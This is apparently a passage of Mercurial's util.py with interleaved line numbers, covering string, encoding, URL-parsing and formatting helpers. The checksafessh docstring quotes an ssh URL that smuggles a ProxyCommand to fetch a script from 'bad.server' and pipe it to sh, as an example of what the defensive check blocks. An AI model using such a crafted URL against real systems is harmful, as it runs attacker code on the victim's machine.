        pattern = pattern[8:]

    if casesensitive:
        match = pattern.__eq__
    else:
        ipat = encoding.lower(pattern)
        match = lambda s: ipat == encoding.lower(s)
    return 'literal', pattern, match
2625 2633
def shortuser(user):
    """Return a short representation of a user name or email address."""
    # strip the domain, keep text inside angle brackets, then cut at
    # the first space or dot -- in that order, matching how names like
    # "First Last <first.last@example.com>" reduce to "first"
    atidx = user.find('@')
    if atidx >= 0:
        user = user[:atidx]
    ltidx = user.find('<')
    if ltidx >= 0:
        user = user[ltidx + 1:]
    for sep in (' ', '.'):
        idx = user.find(sep)
        if idx >= 0:
            user = user[:idx]
    return user
2641 2649
def emailuser(user):
    """Return the user portion of an email address."""
    # drop everything from '@' on, then keep what follows a '<'
    atidx = user.find('@')
    if atidx >= 0:
        user = user[:atidx]
    ltidx = user.find('<')
    if ltidx >= 0:
        user = user[ltidx + 1:]
    return user
2651 2659
def email(author):
    """Return the email address part of an author string.

    Text between '<' and '>' when both are present; with no '<' the
    whole string is returned, and with no '>' everything after '<'.
    """
    start = author.find('<') + 1
    end = author.find('>')
    return author[start:] if end == -1 else author[start:end]
2658 2666
def ellipsis(text, maxlength=400):
    """Trim string to at most maxlength (default: 400) columns in display."""
    # delegated to encoding.trim, which measures display columns (not
    # bytes or characters) and substitutes '...' when it must shorten
    return encoding.trim(text, maxlength, ellipsis='...')
2662 2670
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        magnitude = abs(count)
        # pick the first unit whose threshold the magnitude reaches
        for multiplier, divisor, fmt in unittable:
            if magnitude >= divisor * multiplier:
                return fmt % (count / float(divisor))
        # nothing matched: fall back to the last (smallest-unit) format,
        # applied to the raw count
        return unittable[-1][2] % count

    return go
2673 2681
def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
    ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
    ...
    ParseError: fromline must be strictly positive
    """
    if fromline > toline:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    # convert the 1-based inclusive start to a 0-based half-open range
    return fromline - 1, toline
2694 2702
# Render a byte count using the largest unit that yields at least three
# significant digits, e.g. '1.23 MB' or '456 KB'; counts below 1 KB fall
# through to the plain '%.0f bytes' entry.
bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
2707 2715
class transformingwriter(object):
    """Writable file wrapper to transform data by function"""

    def __init__(self, fp, encode):
        # fp: destination file object
        # encode: callable applied to every chunk before it reaches fp
        self._fp = fp
        self._encode = encode

    def close(self):
        """Close the underlying file object."""
        self._fp.close()

    def flush(self):
        """Flush the underlying file object."""
        self._fp.flush()

    def write(self, data):
        """Transform ``data`` with the encode function and write it,
        returning whatever the underlying write() returns."""
        return self._fp.write(self._encode(data))
2723 2731
# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    """Normalize line endings in ``s`` to LF."""
    return _eolre.sub('\n', s)

def tocrlf(s):
    """Normalize line endings in ``s`` to CRLF."""
    return _eolre.sub('\r\n', s)

def _crlfwriter(fp):
    """Wrap ``fp`` so written data gets CRLF line endings."""
    return transformingwriter(fp, tocrlf)

# Select EOL conversion helpers matching the OS convention: on CRLF
# platforms (Windows) convert on the way in and out; elsewhere they are
# identity functions.
if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity
2746 2754
def escapestr(s):
    """Render non-printable bytes in ``s`` as backslash escape sequences.

    Equivalent to the Python 2 ``s.encode('string_escape')``; calling
    the codec function directly keeps this working on Python 3.
    """
    encoded, _consumed = codecs.escape_encode(s)
    return encoded
2751 2759
def unescapestr(s):
    """Inverse of ``escapestr``: interpret backslash escape sequences."""
    decoded, _consumed = codecs.escape_decode(s)
    return decoded
2754 2762
def forcebytestr(obj):
    """Portably format an arbitrary object (e.g. exception) into a byte
    string."""
    try:
        return pycompat.bytestr(obj)
    except UnicodeEncodeError:
        # non-ascii string, may be lossy
        return pycompat.bytestr(encoding.strtolocal(str(obj)))
2763 2771
def uirepr(s):
    """Return a repr() of ``s`` suitable for showing to the user."""
    # Avoid double backslash in Windows path repr() by collapsing each
    # escaped backslash pair back to a single backslash.
    return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2767 2775
# delay import of textwrap
def MBTextWrapper(**kwargs):
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither number of 'bytes' in any encoding nor 'characters' is
        appropriate to calculate terminal columns for specified string.

        Original TextWrapper implementation uses built-in 'len()' directly,
        so overriding is needed to use width information of each characters.

        In addition, characters classified into 'ambiguous' width are
        treated as wide in East Asian area, but as narrow in other.

        This requires use decision to determine width of such characters.
        """
        def _cutdown(self, ucstr, space_left):
            # Split ucstr into (head, tail) so that head fits within
            # space_left display columns (per encoding.ucolwidth).
            l = 0
            colwidth = encoding.ucolwidth
            for i in xrange(len(ucstr)):
                l += colwidth(ucstr[i])
                if space_left < l:
                    return (ucstr[:i], ucstr[i:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                cut, res = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(cut)
                reversed_chunks[-1] = res
            elif not cur_line:
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chucks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    del chunks[-1]

                while chunks:
                    l = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + l <= width:
                        cur_line.append(chunks.pop())
                        cur_len += l

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines

    # Memoize: replace this factory function with the realized class so
    # subsequent calls skip the class (re)creation.
    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)
2871 2879
def wrap(line, width, initindent='', hangindent=''):
    """Wrap byte string ``line`` to at most ``width`` display columns.

    ``initindent`` prefixes the first output line, ``hangindent`` the
    subsequent ones. Inputs are decoded with the local encoding for
    column-aware wrapping and the result is re-encoded.
    """
    maxindent = max(len(hangindent), len(initindent))
    if width <= maxindent:
        # adjust for weird terminal size
        width = max(78, maxindent + 1)
    line = line.decode(pycompat.sysstr(encoding.encoding),
                       pycompat.sysstr(encoding.encodingmode))
    initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
                                   pycompat.sysstr(encoding.encodingmode))
    hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
                                   pycompat.sysstr(encoding.encodingmode))
    wrapper = MBTextWrapper(width=width,
                            initial_indent=initindent,
                            subsequent_indent=hangindent)
    return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2887 2895
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            """Iterate over fp's lines without tripping the EINTR bug."""
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            """Yield lines from fp, retrying raw os.read on EINTR."""
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            # incomplete trailing line: keep accumulating
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        """Return an iterator over fp's lines that is safe against EINTR."""
        fastpath = True
        if type(fp) is file:
            # regular on-disk files never see EINTR on modern systems
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        """Return an iterator over fp's lines (no workaround needed here)."""
        return fp
2959 2967
def iterlines(iterator):
    """Yield the individual lines contained in an iterable of text chunks.

    Line terminators are not included in the yielded lines.
    """
    for block in iterator:
        for oneline in block.splitlines():
            yield oneline
2964 2972
def expandpath(path):
    """Expand environment variables and a leading ``~`` in ``path``."""
    # variables first, then the user home -- same order as the callers expect
    withvars = os.path.expandvars(path)
    return os.path.expanduser(withvars)
2967 2975
def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if mainfrozen():
        # frozen (bundled) builds: invoke the bundled executable directly
        if getattr(sys, 'frozen', None) == 'macosx_app':
            # Env variable set by py2app
            return [encoding.environ['EXECUTABLEPATH']]
        else:
            return [pycompat.sysexecutable]
    return gethgcmd()
2982 2990
def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent wait on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        # os.wait() returns a (pid, status) tuple; record only the pid so
        # the ``pid in terminated`` membership test below can match.
        # (Previously the whole tuple was stored, so the test could never
        # be true and only the testpid() fallback detected early exits.)
        terminated.add(os.wait()[0])
    prevhandler = None
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        # restore the previous SIGCHLD disposition
        if prevhandler is not None:
            signal.signal(signal.SIGCHLD, prevhandler)
3017 3025
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    # NOTE(review): mapping keys are inserted into the pattern unescaped;
    # callers appear to pass regex-safe keys -- confirm before reusing.
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        # NOTE: this mutates the caller's mapping, registering the prefix
        # character as its own replacement (so doubled prefix escapes it)
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
3042 3050
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        # not numeric: fall through to a service-name lookup
        pass

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise Abort(_("no port number associated with service '%s'") % port)
3059 3067
# Recognized case-insensitive spellings for boolean config values.
_booleans = dict(
    [(k, True) for k in ('1', 'yes', 'true', 'on', 'always')] +
    [(k, False) for k in ('0', 'no', 'false', 'off', 'never')])

def parsebool(s):
    """Parse s into a boolean.

    If s is not a valid boolean, returns None.
    """
    return _booleans.get(s.lower(), None)
3070 3078
3071 3079 _hextochr = dict((a + b, chr(int(a + b, 16)))
3072 3080 for a in string.hexdigits for b in string.hexdigits)
3073 3081
3074 3082 class url(object):
3075 3083 r"""Reliable URL parser.
3076 3084
3077 3085 This parses URLs and provides attributes for the following
3078 3086 components:
3079 3087
3080 3088 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
3081 3089
3082 3090 Missing components are set to None. The only exception is
3083 3091 fragment, which is set to '' if present but empty.
3084 3092
3085 3093 If parsefragment is False, fragment is included in query. If
3086 3094 parsequery is False, query is included in path. If both are
3087 3095 False, both fragment and query are included in path.
3088 3096
3089 3097 See http://www.ietf.org/rfc/rfc2396.txt for more information.
3090 3098
3091 3099 Note that for backward compatibility reasons, bundle URLs do not
3092 3100 take host names. That means 'bundle://../' has a path of '../'.
3093 3101
3094 3102 Examples:
3095 3103
3096 3104 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
3097 3105 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
3098 3106 >>> url(b'ssh://[::1]:2200//home/joe/repo')
3099 3107 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
3100 3108 >>> url(b'file:///home/joe/repo')
3101 3109 <url scheme: 'file', path: '/home/joe/repo'>
3102 3110 >>> url(b'file:///c:/temp/foo/')
3103 3111 <url scheme: 'file', path: 'c:/temp/foo/'>
3104 3112 >>> url(b'bundle:foo')
3105 3113 <url scheme: 'bundle', path: 'foo'>
3106 3114 >>> url(b'bundle://../foo')
3107 3115 <url scheme: 'bundle', path: '../foo'>
3108 3116 >>> url(br'c:\foo\bar')
3109 3117 <url path: 'c:\\foo\\bar'>
3110 3118 >>> url(br'\\blah\blah\blah')
3111 3119 <url path: '\\\\blah\\blah\\blah'>
3112 3120 >>> url(br'\\blah\blah\blah#baz')
3113 3121 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3114 3122 >>> url(br'file:///C:\users\me')
3115 3123 <url scheme: 'file', path: 'C:\\users\\me'>
3116 3124
3117 3125 Authentication credentials:
3118 3126
3119 3127 >>> url(b'ssh://joe:xyz@x/repo')
3120 3128 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3121 3129 >>> url(b'ssh://joe@x/repo')
3122 3130 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3123 3131
3124 3132 Query strings and fragments:
3125 3133
3126 3134 >>> url(b'http://host/a?b#c')
3127 3135 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3128 3136 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3129 3137 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3130 3138
3131 3139 Empty path:
3132 3140
3133 3141 >>> url(b'')
3134 3142 <url path: ''>
3135 3143 >>> url(b'#a')
3136 3144 <url path: '', fragment: 'a'>
3137 3145 >>> url(b'http://host/')
3138 3146 <url scheme: 'http', host: 'host', path: ''>
3139 3147 >>> url(b'http://host/#a')
3140 3148 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3141 3149
3142 3150 Only scheme:
3143 3151
3144 3152 >>> url(b'http:')
3145 3153 <url scheme: 'http'>
3146 3154 """
3147 3155
3148 3156 _safechars = "!~*'()+"
3149 3157 _safepchars = "/!~*'()+:\\"
3150 3158 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
3151 3159
3152 3160 def __init__(self, path, parsequery=True, parsefragment=True):
3153 3161 # We slowly chomp away at path until we have only the path left
3154 3162 self.scheme = self.user = self.passwd = self.host = None
3155 3163 self.port = self.path = self.query = self.fragment = None
3156 3164 self._localpath = True
3157 3165 self._hostport = ''
3158 3166 self._origpath = path
3159 3167
3160 3168 if parsefragment and '#' in path:
3161 3169 path, self.fragment = path.split('#', 1)
3162 3170
3163 3171 # special case for Windows drive letters and UNC paths
3164 3172 if hasdriveletter(path) or path.startswith('\\\\'):
3165 3173 self.path = path
3166 3174 return
3167 3175
3168 3176 # For compatibility reasons, we can't handle bundle paths as
3169 3177 # normal URLS
3170 3178 if path.startswith('bundle:'):
3171 3179 self.scheme = 'bundle'
3172 3180 path = path[7:]
3173 3181 if path.startswith('//'):
3174 3182 path = path[2:]
3175 3183 self.path = path
3176 3184 return
3177 3185
3178 3186 if self._matchscheme(path):
3179 3187 parts = path.split(':', 1)
3180 3188 if parts[0]:
3181 3189 self.scheme, path = parts
3182 3190 self._localpath = False
3183 3191
3184 3192 if not path:
3185 3193 path = None
3186 3194 if self._localpath:
3187 3195 self.path = ''
3188 3196 return
3189 3197 else:
3190 3198 if self._localpath:
3191 3199 self.path = path
3192 3200 return
3193 3201
3194 3202 if parsequery and '?' in path:
3195 3203 path, self.query = path.split('?', 1)
3196 3204 if not path:
3197 3205 path = None
3198 3206 if not self.query:
3199 3207 self.query = None
3200 3208
3201 3209 # // is required to specify a host/authority
3202 3210 if path and path.startswith('//'):
3203 3211 parts = path[2:].split('/', 1)
3204 3212 if len(parts) > 1:
3205 3213 self.host, path = parts
3206 3214 else:
3207 3215 self.host = parts[0]
3208 3216 path = None
3209 3217 if not self.host:
3210 3218 self.host = None
3211 3219 # path of file:///d is /d
3212 3220 # path of file:///d:/ is d:/, not /d:/
3213 3221 if path and not hasdriveletter(path):
3214 3222 path = '/' + path
3215 3223
3216 3224 if self.host and '@' in self.host:
3217 3225 self.user, self.host = self.host.rsplit('@', 1)
3218 3226 if ':' in self.user:
3219 3227 self.user, self.passwd = self.user.split(':', 1)
3220 3228 if not self.host:
3221 3229 self.host = None
3222 3230
3223 3231 # Don't split on colons in IPv6 addresses without ports
3224 3232 if (self.host and ':' in self.host and
3225 3233 not (self.host.startswith('[') and self.host.endswith(']'))):
3226 3234 self._hostport = self.host
3227 3235 self.host, self.port = self.host.rsplit(':', 1)
3228 3236 if not self.host:
3229 3237 self.host = None
3230 3238
3231 3239 if (self.host and self.scheme == 'file' and
3232 3240 self.host not in ('localhost', '127.0.0.1', '[::1]')):
3233 3241 raise Abort(_('file:// URLs can only refer to localhost'))
3234 3242
3235 3243 self.path = path
3236 3244
3237 3245 # leave the query string escaped
3238 3246 for a in ('user', 'passwd', 'host', 'port',
3239 3247 'path', 'fragment'):
3240 3248 v = getattr(self, a)
3241 3249 if v is not None:
3242 3250 setattr(self, a, urlreq.unquote(v))
3243 3251
3244 3252 @encoding.strmethod
3245 3253 def __repr__(self):
3246 3254 attrs = []
3247 3255 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
3248 3256 'query', 'fragment'):
3249 3257 v = getattr(self, a)
3250 3258 if v is not None:
3251 3259 attrs.append('%s: %r' % (a, v))
3252 3260 return '<url %s>' % ', '.join(attrs)
3253 3261
    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        # Local paths (no authority component) are emitted nearly verbatim:
        # only an optional 'bundle:' prefix and fragment are re-attached.
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            # No authority, but the scheme + path shape still requires the
            # '//' separator (e.g. file:///tmp/x, file:///c:/x).
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            # Bracketed IPv6 literals must not be percent-quoted.
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    # Native-string variant of __bytes__ (returns str on Python 3).
    __str__ = encoding.strmethod(__bytes__)
3332 3340
    def authinfo(self):
        """Return (credential-free URL, urllib auth tuple or None).

        The second element is None when the URL carries no username;
        otherwise it is shaped for urllib2's password manager.
        """
        user, passwd = self.user, self.passwd
        try:
            # Temporarily strip credentials so bytes(self) serializes the
            # URL without them; restore unconditionally afterwards.
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))
3348 3356
3349 3357 def isabs(self):
3350 3358 if self.scheme and self.scheme != 'file':
3351 3359 return True # remote URL
3352 3360 if hasdriveletter(self.path):
3353 3361 return True # absolute for our purposes - can't be joined()
3354 3362 if self.path.startswith(br'\\'):
3355 3363 return True # Windows UNC path
3356 3364 if self.path.startswith('/'):
3357 3365 return True # POSIX-style
3358 3366 return False
3359 3367
    def localpath(self):
        """Return a local filesystem path for file:/bundle: URLs.

        For other schemes, the original unparsed URL string is returned.
        """
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath
3372 3380
3373 3381 def islocal(self):
3374 3382 '''whether localpath will return something that posixfile can open'''
3375 3383 return (not self.scheme or self.scheme == 'file'
3376 3384 or self.scheme == 'bundle')
3377 3385
def hasscheme(path):
    """Report whether ``path`` parses as a URL with an explicit scheme."""
    parsed = url(path)
    return True if parsed.scheme else False
3380 3388
def hasdriveletter(path):
    """Check whether ``path`` begins with a Windows drive letter ('c:...').

    Falsy inputs (empty string, None) are returned unchanged, mirroring the
    short-circuit behavior callers rely on in boolean context.
    """
    if not path:
        return path
    return path[0:1].isalpha() and path[1:2] == ':'
3383 3391
def urllocalpath(path):
    """Return the local filesystem path for ``path`` parsed as a URL."""
    parsed = url(path, parsequery=False, parsefragment=False)
    return parsed.localpath()
3386 3394
def checksafessh(path):
    """Reject a path / url that is a potential ssh exploit (SEC).

    ssh parses the first item of a URL as an option, e.g.
    ssh://-oProxyCommand=curl${IFS}bad.server|sh/path, so any ssh URL whose
    host begins with a dash is refused outright and the user is warned.

    Raises an error.Abort when the url is unsafe; returns nothing otherwise.
    """
    unquoted = urlreq.unquote(path)
    if unquoted.startswith(('ssh://-', 'svn+ssh://-')):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (pycompat.bytestr(unquoted),))
3401 3409
def hidepassword(u):
    """Return ``u`` re-serialized with any password masked as ``***``."""
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = '***'
    return bytes(parsed)
3408 3416
def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    # Serialize via bytes() for consistency with hidepassword() above:
    # str(u) goes through encoding.strmethod and would return a unicode
    # string on Python 3 where callers expect bytes.
    return bytes(u)
3414 3422
# Formatter for durations with an auto-selected unit (s/ms/us/ns).
# Built by unitcountfn (defined earlier in this file); each triple is
# presumably (threshold, divisor, format string) — the first matching
# entry wins. TODO confirm against unitcountfn's definition.
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )

# Shared indentation depth for nested @timed reports; a one-element list
# so nested wrapper invocations mutate common state.
_timenesting = [0]
3432 3440
def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        begin = timer()
        step = 2
        # Indent nested @timed calls so the report reads as a tree.
        _timenesting[0] += step
        try:
            return func(*args, **kwargs)
        finally:
            duration = timer() - begin
            _timenesting[0] -= step
            stderr.write('%s%s: %s\n' %
                         (' ' * _timenesting[0], func.__name__,
                          timecount(duration)))
    return wrapper
3457 3465
# Suffix -> multiplier table for sizetoint(). Order matters: the bare 'b'
# entry must come after 'kb'/'mb'/'gb' so the longer suffixes match first.
_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    value = s.strip().lower()
    try:
        for suffix, multiplier in _sizeunits:
            if value.endswith(suffix):
                number = float(value[:-len(suffix)])
                return int(number * multiplier)
        return int(value)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)
3479 3487
class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        # (source, callable) pairs; left unsorted until invocation time.
        self._hooks = []

    def add(self, source, hook):
        """Register ``hook`` keyed by ``source`` (the ordering key)."""
        self._hooks.append((source, hook))

    def __call__(self, *args):
        # Sort lazily on every call so registration order never matters.
